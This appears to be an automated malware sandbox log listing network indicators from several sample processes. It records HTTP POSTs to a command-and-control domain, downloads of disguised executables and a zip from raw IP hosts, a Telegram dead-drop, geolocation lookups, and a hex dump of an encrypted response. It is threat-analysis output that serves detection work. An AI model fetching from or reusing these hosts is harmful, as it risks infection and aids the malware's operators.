Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnnhfx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xoeixqhnce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://starvestitibo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 617Host: starvestitibo.org
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.217.246.41/
Source: 5487.exe, 00000012.00000002.521075349.000000001AE50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://95.217.246.41/1752
Source: 5487.exe, 00000012.00000002.521075349.000000001AE50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://95.217.246.41/815243149147.zip
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.217.246.41/m
Source: 5487.exe, 00000012.00000003.444876306.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.217.246.41:80
Source: 5487.exe, 00000012.00000002.509319814.000000000019C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://95.217.246.41:80/815243149147.zip
Source: 5487.exe, 00000012.00000002.509319814.000000000019C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://95.217.246.41:80/815243149147.zipz
Source: 5487.exe, 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, 5487.exe, 00000012.00000002.509467552.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 5487.exe, 00000012.00000003.421456756.00000000008F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://95.217.27.155:80
Source: 5487.exe, 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, 5487.exe, 00000012.00000002.509467552.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 5487.exe, 00000012.00000003.421456756.00000000008F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://95.217.27.155:80hello0bad
Source: 5487.exe, 00000012.00000003.446444165.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, 5487.exe, 00000012.00000002.514752262.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 509E.dll.1.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 509E.dll.1.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: 5487.exe, 00000012.00000002.514521211.0000000000A04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://o365.217.246.41/
Source: 509E.dll.1.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: explorer.exe, 00000015.00000000.419198116.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000002.421091723.00000000008F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://starvestitibo.org/
Source: explorer.exe, 00000015.00000000.419198116.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000002.421091723.00000000008F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://starvestitibo.org/Mozilla/5.0
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: 37F1.exe, 0000000C.00000002.549362346.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.548078417.0000000004FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: explorer.exe, 00000001.00000000.267707719.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.335250182.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.353966901.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311720249.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322805937.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340820239.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.280437833.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.298806313.000000000F52A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 5487.exe, 00000012.00000002.530354600.0000000061ED3000.00000008.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 48699315731429539716450555.18.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: 37F1.exe, 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, 37F1.exe, 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, 37F1.exe, 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: 5487.exe, 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, 5487.exe, 00000012.00000002.509467552.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 5487.exe, 00000012.00000003.421456756.00000000008F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://c.im/
Source: 48699315731429539716450555.18.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 48699315731429539716450555.18.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 58104588985205123450110019.18.dr, 561C.tmp.20.dr, 48699315731429539716450555.18.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 48699315731429539716450555.18.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 58104588985205123450110019.18.dr, 561C.tmp.20.dr, 48699315731429539716450555.18.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 58104588985205123450110019.18.dr, 561C.tmp.20.dr, 48699315731429539716450555.18.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 58104588985205123450110019.18.dr, 561C.tmp.20.dr, 48699315731429539716450555.18.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 58104588985205123450110019.18.dr, 561C.tmp.20.dr, 48699315731429539716450555.18.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 509E.dll.1.dr String found in binary or memory: https://sectigo.com/CPS0
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: 5487.exe, 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, 5487.exe, 00000012.00000002.509467552.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 5487.exe, 00000012.00000003.444876306.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, 5487.exe, 00000012.00000003.446444165.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 5487.exe, 00000012.00000003.421456756.00000000008F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/truemansho
Source: 5487.exe, 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, 5487.exe, 00000012.00000002.509467552.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 5487.exe, 00000012.00000003.421456756.00000000008F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/truemanshohttps://c.im/
Source: 5487.exe, 00000012.00000002.521075349.000000001AE50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: 58104588985205123450110019.18.dr, 561C.tmp.20.dr, 48699315731429539716450555.18.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: furubujjul.net
Source: global traffic HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shingroup.com
Source: global traffic HTTP traffic detected: GET /truemansho HTTP/1.1Host: t.me
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.174.137.70
Source: global traffic HTTP traffic detected: GET /1752 HTTP/1.1Host: 95.217.246.41
Source: global traffic HTTP traffic detected: GET /815243149147.zip HTTP/1.1Host: 95.217.246.41Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 03 Nov 2022 11:46:48 GMTcontent-type: text/htmlcontent-length: 150vary: Accept-Encodingserver: NginXData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 19 00 00 00 1f 3d 5a e4 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 8a ae 57 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db 